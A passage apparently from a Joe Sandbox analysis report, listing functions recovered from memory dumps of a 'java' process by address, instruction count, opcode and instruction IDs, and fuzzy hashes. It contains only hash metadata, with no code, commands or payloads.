                                                            • Instruction ID: b17dc4eaad569e7bd960c1cc64ad3e6edf5848fef8bae757c27afe7323310fe5
                                                            • Opcode Fuzzy Hash: e3d5cbe15746f150fa6b9fb0ceaa284a8edb738846d4280fe016514ba570dab1
                                                            • Instruction Fuzzy Hash: 4D61D0307402058FCF259BB5886877A7AAAAFC6258F14983FE546CB394DF74CC45CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9A718 Relevance: .2, Instructions: 177COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ace7d7eb8aaf32df9bcdda5b51f2de955d12e2d2d804a61a538bd5c478f0e361
                                                            • Instruction ID: 584fc00942375a161eb4e262a69be1072223c03d5eb68f019fe5bdb4fb7798d9
                                                            • Opcode Fuzzy Hash: ace7d7eb8aaf32df9bcdda5b51f2de955d12e2d2d804a61a538bd5c478f0e361
                                                            • Instruction Fuzzy Hash: A75181317841158FCB24DF39D89896ABBF9BF4925471594BAE806CB3A1EB31DC02CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E98360 Relevance: .1, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 193b310ef38661e3f909de0a27650ab718d71bea7d95f0aef9f9f2fb453ab6f0
                                                            • Instruction ID: afa91ce79ad2f6c6e34ae34e9369aac0a161d0943b068c10308e971d74fd2189
                                                            • Opcode Fuzzy Hash: 193b310ef38661e3f909de0a27650ab718d71bea7d95f0aef9f9f2fb453ab6f0
                                                            • Instruction Fuzzy Hash: 99412A31B401048FCB14DB74D9586EE7BF6AFCA650F15486AE506DB3A1CF309C06CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E99AF0 Relevance: .1, Instructions: 113COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ef02b814c5d5cee42215833f6c4f3b76182e527d4d9dcf5a28ed298fe7dd3999
                                                            • Instruction ID: efcc41886a38e30691b4f2529b6a41d1e019e7d8d4e7a888598ccf2f45f1a4b8
                                                            • Opcode Fuzzy Hash: ef02b814c5d5cee42215833f6c4f3b76182e527d4d9dcf5a28ed298fe7dd3999
                                                            • Instruction Fuzzy Hash: CF41D6313401189FCB15DF29E8286BA7BE6EF89355F05846AF909CB351EB38DC15CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E952E8 Relevance: .1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca55b56f8121612b026aec80819ec079ccef9f72913f7dd2798961c2f9796f9d
                                                            • Instruction ID: 7ca4a485f58dcfa13630163f183ec102f4dd0bc0e063a310d108ce166afc5adc
                                                            • Opcode Fuzzy Hash: ca55b56f8121612b026aec80819ec079ccef9f72913f7dd2798961c2f9796f9d
                                                            • Instruction Fuzzy Hash: 8D318B307402199FCF06EF65E858AAF7B62FB89344F118429FA068B294CB74D925DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9A958 Relevance: .1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1c92af7e653cd8ea97eeb9b7226588cb8c00c1d141ecee82106ad0eae673fb64
                                                            • Instruction ID: 17156c2f7526e5f4b61839b757c354600849bdc228ed9d26e54b86035382d72d
                                                            • Opcode Fuzzy Hash: 1c92af7e653cd8ea97eeb9b7226588cb8c00c1d141ecee82106ad0eae673fb64
                                                            • Instruction Fuzzy Hash: 9A21E2303842188FDF25663599643BE769BEFC5658F24E03AD906CB396EBA9CC42C741
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9A230 Relevance: .1, Instructions: 85COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ee1381ac841e0f4529ee0fa60b77776c8fc66f23104160e52891eb87091362e1
                                                            • Instruction ID: ece576252843680b17024aa8cd73f76926f55cbed7190d72780cf98ce3ed18bc
                                                            • Opcode Fuzzy Hash: ee1381ac841e0f4529ee0fa60b77776c8fc66f23104160e52891eb87091362e1
                                                            • Instruction Fuzzy Hash: AA319A31640119AFCF06AF54D854AAE7BA2EF89354F10942AFA09CB350CB36C925DB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9A860 Relevance: .1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bfeee7a2e95df10c927ba5fba473883d8433e1178b958b58e1496ad6758c9938
                                                            • Instruction ID: 57bd7fcf39df430aaf96ab9e97b9f3e4a4ef7d22753e1733bf9e80e826788499
                                                            • Opcode Fuzzy Hash: bfeee7a2e95df10c927ba5fba473883d8433e1178b958b58e1496ad6758c9938
                                                            • Instruction Fuzzy Hash: 842191307442599FCF14DF6AA854ABB7BF9EF45244B169837E842CB345DB30D801C7A0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9646F Relevance: .1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3fa8c7c9808055a8c00f1ad67f976c417ef80655c906691845041dc16bc2d85b
                                                            • Instruction ID: 0a53c1c332f8f92fd6bd72235eb702062bb5baef0e5a80de4e1e5794f4ad9879
                                                            • Opcode Fuzzy Hash: 3fa8c7c9808055a8c00f1ad67f976c417ef80655c906691845041dc16bc2d85b
                                                            • Instruction Fuzzy Hash: 8C2128307406108FCB259B75D86897AB76AFF86759B16856BE90ACB395CF30DC06CB80
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E95287 Relevance: .1, Instructions: 83COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a7e1c15846bdca3c07e6eebdbe4e9b135e2a3a99d63a1fa19c522df0d312d4a
                                                            • Instruction ID: 307a0cbb3f86fac79916f61cd2566b30a99198b98b9668121ef650317012b254
                                                            • Opcode Fuzzy Hash: 1a7e1c15846bdca3c07e6eebdbe4e9b135e2a3a99d63a1fa19c522df0d312d4a
                                                            • Instruction Fuzzy Hash: 90210A317442588FCB06DF39D4A86EA3B71EF42348F14C4AAE5868F252CB74D917CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E940D8 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d6ed8624914076af98d4b5f2acedcab362a539f4d5d035a1430c9d614f2dc01
                                                            • Instruction ID: 93c3f23beea106dacc1fce27c0d2394498c224e75172fcc50827528ace195cc0
                                                            • Opcode Fuzzy Hash: 9d6ed8624914076af98d4b5f2acedcab362a539f4d5d035a1430c9d614f2dc01
                                                            • Instruction Fuzzy Hash: 8E31D674D002588FDB18CFAAD9547EDBBF2AF89304F18D139D405AB695DB384986CF14
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00FED3DC Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.422614982.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_fed000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 50efe7987a356a68b8ab3a599ce6167faac923e56b231b026d04194d8ca8aa29
                                                            • Instruction ID: 24ac6957df4e9708b79b5204610accac3d90ee2c0f0e4b7854460ea0ad012765
                                                            • Opcode Fuzzy Hash: 50efe7987a356a68b8ab3a599ce6167faac923e56b231b026d04194d8ca8aa29
                                                            • Instruction Fuzzy Hash: BF213D72504284DFCB05DF14D9C0B57BB65FBA4324F24C569E9050B686C336E855D7A2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00FED4C8 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.422614982.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_fed000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 83f3da0c68c6301c33ab935215775c715229855066425d0aee28df7c84bafdeb
                                                            • Instruction ID: 49fdf24c4a45275ff9334032bbe8c7d7c51040a22cf41b4b3c3764e6d32e7011
                                                            • Opcode Fuzzy Hash: 83f3da0c68c6301c33ab935215775c715229855066425d0aee28df7c84bafdeb
                                                            • Instruction Fuzzy Hash: 45216A72500384DFCB11CF14C9C0B16BF65FB94328F2885A9E8090B646C336D845E7A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9D0C2 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8519b085c8cac3d74ffba6cee401d5dc15ac30f4dc3524f2f147a758fad06064
                                                            • Instruction ID: 1098e59a7dac6c32ab4035efe309978fed405985347d7bfe48b2e7f38c69eee6
                                                            • Opcode Fuzzy Hash: 8519b085c8cac3d74ffba6cee401d5dc15ac30f4dc3524f2f147a758fad06064
                                                            • Instruction Fuzzy Hash: 2731C5B4E002099FCB44DFAAC5809AEFBF2EF89200F20D46AD818E7355D7749A41CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9D0D0 Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 00235908ad4febe35818fe12f638ebd9995a1c495b1b5220696a5ac29000efc4
                                                            • Instruction ID: 15fefb09be46a3c0dbb58d6a4fa86ffc837b57448ca5b2454ea0237fc88d5f63
                                                            • Opcode Fuzzy Hash: 00235908ad4febe35818fe12f638ebd9995a1c495b1b5220696a5ac29000efc4
                                                            • Instruction Fuzzy Hash: 663194B4E102199FCB44DFAAC5819AEBBF2AF88300F20D56AD818A7314D7749941CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9D1C8 Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5522c493c08639b289efd68893f67f9b13c31945a23a3fea8ed929319174abee
                                                            • Instruction ID: fdc5ed3067fa92dd816d39d067aa7127ba9ded0c6be8b29e78bbf716b7c03e07
                                                            • Opcode Fuzzy Hash: 5522c493c08639b289efd68893f67f9b13c31945a23a3fea8ed929319174abee
                                                            • Instruction Fuzzy Hash: 8F3146B0E042599FCB04DFAAC944A9EFBF2AF89300F14C5AAD418A7355E7309A41CF61
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E98350 Relevance: .1, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb7e0b23fbeee50c0a289e49ca11b9d10669efbd7286e4ee82bd2eb01c2b7c53
                                                            • Instruction ID: 0d1d0c326c0fc26f4b309f81a8bc39c7a8510e59711d078bf169f38009b6bf0b
                                                            • Opcode Fuzzy Hash: bb7e0b23fbeee50c0a289e49ca11b9d10669efbd7286e4ee82bd2eb01c2b7c53
                                                            • Instruction Fuzzy Hash: 7F11A276B402089BCF10DF65C948BDEBBB6FF4D650F15442AE911A7350CB71AC10CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9D1D8 Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 86f1fd1ebe8d99204c5c07834831b661ed9c5168cd072cde6f3be5af999d2b41
                                                            • Instruction ID: 2a2f032d21edc8d473261975477f5f91898dda3ac9c1869de62921a539720eff
                                                            • Opcode Fuzzy Hash: 86f1fd1ebe8d99204c5c07834831b661ed9c5168cd072cde6f3be5af999d2b41
                                                            • Instruction Fuzzy Hash: D22105B4E40219DFCB44DFAAC9849AEFBF2AF89304F10D5A6C418A7314D7309A41CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E952E3 Relevance: .1, Instructions: 63COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7e1c4b9047e7b43580a535e18728c1c7875a87bcf68d4c08024a798e711615bd
                                                            • Instruction ID: 23ca9fd7adf3596f5f3d46e29f42c28814e56fdbf0c6a1f39c6b4d57cfd09843
                                                            • Opcode Fuzzy Hash: 7e1c4b9047e7b43580a535e18728c1c7875a87bcf68d4c08024a798e711615bd
                                                            • Instruction Fuzzy Hash: 1711AC317402289FCB16EF26E81876F77A6EB85754F51C42AFA068B384CB78DD15CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9EEA8 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1b3ef0a270d677c13f210da96b9602210454bbf817a81f652ddbe6bab47e545f
                                                            • Instruction ID: 0c988a412d55c8cd33d0dcfbf913603ce7acea469a48e00c2a23cdb5d44225e3
                                                            • Opcode Fuzzy Hash: 1b3ef0a270d677c13f210da96b9602210454bbf817a81f652ddbe6bab47e545f
                                                            • Instruction Fuzzy Hash: DE11F674E40108EFCB44DFAAC584A9EFBF6EF89300F18D8AA9518A7354DB309A51CF41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00FED3D7 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.422614982.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_fed000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 26050ac9a710059c9b477200a138371d2ae940eb4f2ea16139302a11668e0a51
                                                            • Instruction ID: c17229078f8c07c167367c3ba1ece00845e489372ef3144312684faabaed2cc4
                                                            • Opcode Fuzzy Hash: 26050ac9a710059c9b477200a138371d2ae940eb4f2ea16139302a11668e0a51
                                                            • Instruction Fuzzy Hash: 3F11E976804280DFCF15CF14D5C4B16BF72FB94324F24C6A9D8040B656C336D456DBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00FED4C3 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.422614982.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_fed000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 26050ac9a710059c9b477200a138371d2ae940eb4f2ea16139302a11668e0a51
                                                            • Instruction ID: 19ad319ee168fd4f529b059748b2899df49c663df94de1a5eee454e5e48dabcf
                                                            • Opcode Fuzzy Hash: 26050ac9a710059c9b477200a138371d2ae940eb4f2ea16139302a11668e0a51
                                                            • Instruction Fuzzy Hash: 9C11B176804280CFCB15CF10D9C4B16BF71FB94328F2886A9D8090B656C336D85ADBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9A221 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5d303f9945f17807b1d1ff085ce1b6deea8d72cd5d45d2eee1f6ca28820041a6
                                                            • Instruction ID: caba2fc80e854b069f00d80362025896e2a90546fa913a305c9d7cfbf05cd689
                                                            • Opcode Fuzzy Hash: 5d303f9945f17807b1d1ff085ce1b6deea8d72cd5d45d2eee1f6ca28820041a6
                                                            • Instruction Fuzzy Hash: F911BC316402199FCF11AF64E844BAE7BA1EF88354F10943AF9098B300D735C925CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9A328 Relevance: .0, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 21e5a3b8f1d38ea9257b67888e0a1e2fcc3368b9e94dbff709955dd548ab0afc
                                                            • Instruction ID: 9a89d8f311b37d1d69412e895f1205b11a6fad992f64448e51f22a5e1780895c
                                                            • Opcode Fuzzy Hash: 21e5a3b8f1d38ea9257b67888e0a1e2fcc3368b9e94dbff709955dd548ab0afc
                                                            • Instruction Fuzzy Hash: C901D432B400186FCB15DF59A814BEF7BABDFCA790F05842AFA04D7340DA7589159BD1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9BAF0 Relevance: .0, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ab8ae957067cc5b2846110c150e0cf8db5c5ae54e1c8f388a6980d9a033f09ec
                                                            • Instruction ID: b5ae6b28b22ad6b07c7c1d49a5eb83dbb0262ebff034a05bf012016fc39e4ded
                                                            • Opcode Fuzzy Hash: ab8ae957067cc5b2846110c150e0cf8db5c5ae54e1c8f388a6980d9a033f09ec
                                                            • Instruction Fuzzy Hash: EC01D270E56244DFCB02CF74E46D19DBFB1EB96205F19D8AAD04497289EA309A06DB12
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00FED821 Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.422614982.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_fed000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b26ceb18c250f09ee921acde43eea40684fd4a0b9208592d375f3f07abad8d2a
                                                            • Instruction ID: f4d58b8f75efe3d05565ea88c0798e91c980a8dc614274e740aa85906dd6d2fe
                                                            • Opcode Fuzzy Hash: b26ceb18c250f09ee921acde43eea40684fd4a0b9208592d375f3f07abad8d2a
                                                            • Instruction Fuzzy Hash: F20147718083849AD7104E57CC847A6FBDCEF40334F188859ED044BA82C774DD44D6B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9BB00 Relevance: .0, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fde3ba71892c5144eb90a8a3ec536bdb7fd678be8bafaaa274b67a927d0cd0cd
                                                            • Instruction ID: cc385ef18c8476275a89c074041b9345353661e2cc1a434df7d4c5d7b6cfaed0
                                                            • Opcode Fuzzy Hash: fde3ba71892c5144eb90a8a3ec536bdb7fd678be8bafaaa274b67a927d0cd0cd
                                                            • Instruction Fuzzy Hash: D5F0FF30E60208DFCB04DFB5E56D29DBFB6FBC9206F20D86AD40893248EB308A019B41
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00FED820 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.422614982.0000000000FED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FED000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_fed000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fca0da719d185f7d3e3e5e09239812acb19bd4c800202afa6ee07a5961856759
                                                            • Instruction ID: 86dc8bf83b7353aadbd16c0d398f3ba5ae06bdd37c843b455a839333a6461885
                                                            • Opcode Fuzzy Hash: fca0da719d185f7d3e3e5e09239812acb19bd4c800202afa6ee07a5961856759
                                                            • Instruction Fuzzy Hash: FEF0C271808384AEEB208E06CDC4BA2FBD8EB51734F18C45AED085F682C3789C44CAB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9DB2D Relevance: .0, Instructions: 32COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 151c948775db1672e15df55899bff5544cd52fb5608dbfc3ecf9cfaaef0f35fc
                                                            • Instruction ID: 7409586973838587018b35c51195329d8132e2b4ecfdb44c49f37715482bafe4
                                                            • Opcode Fuzzy Hash: 151c948775db1672e15df55899bff5544cd52fb5608dbfc3ecf9cfaaef0f35fc
                                                            • Instruction Fuzzy Hash: 7A113D78901228DFCBA9CF64C985AD8BBF1BB48311F1081D9E909A7325DB359E91DF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9C322 Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5567d137148e310022b6cfddebe50a670aa931282b8b3b1aa2fb84154ef45f16
                                                            • Instruction ID: 8f8d507c48187600d352048b399e08755619ce76b5bae7e33a7f20e18b29effc
                                                            • Opcode Fuzzy Hash: 5567d137148e310022b6cfddebe50a670aa931282b8b3b1aa2fb84154ef45f16
                                                            • Instruction Fuzzy Hash: 54F0B770D056188BDF54CF9A895078EBAF3BB88300F10D1A9D108AB354D6344A818F55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02E9D9BA Relevance: .0, Instructions: 21COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.423503784.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_2e90000_java.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5e3e01433760252b58c06386549e453b9ef014783b8b0419f8720e7683119007
                                                            • Instruction ID: 6cb219e8f4057a68c7222c8bab31701c0b853bd3ac637e490db076954a74402b
                                                            • Opcode Fuzzy Hash: 5e3e01433760252b58c06386549e453b9ef014783b8b0419f8720e7683119007
                                                            • Instruction Fuzzy Hash: 74F06C74D12668DFCB65DF64C988AD9BBB1FB89316F0095D9E40AA7310DB30AE81CF40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

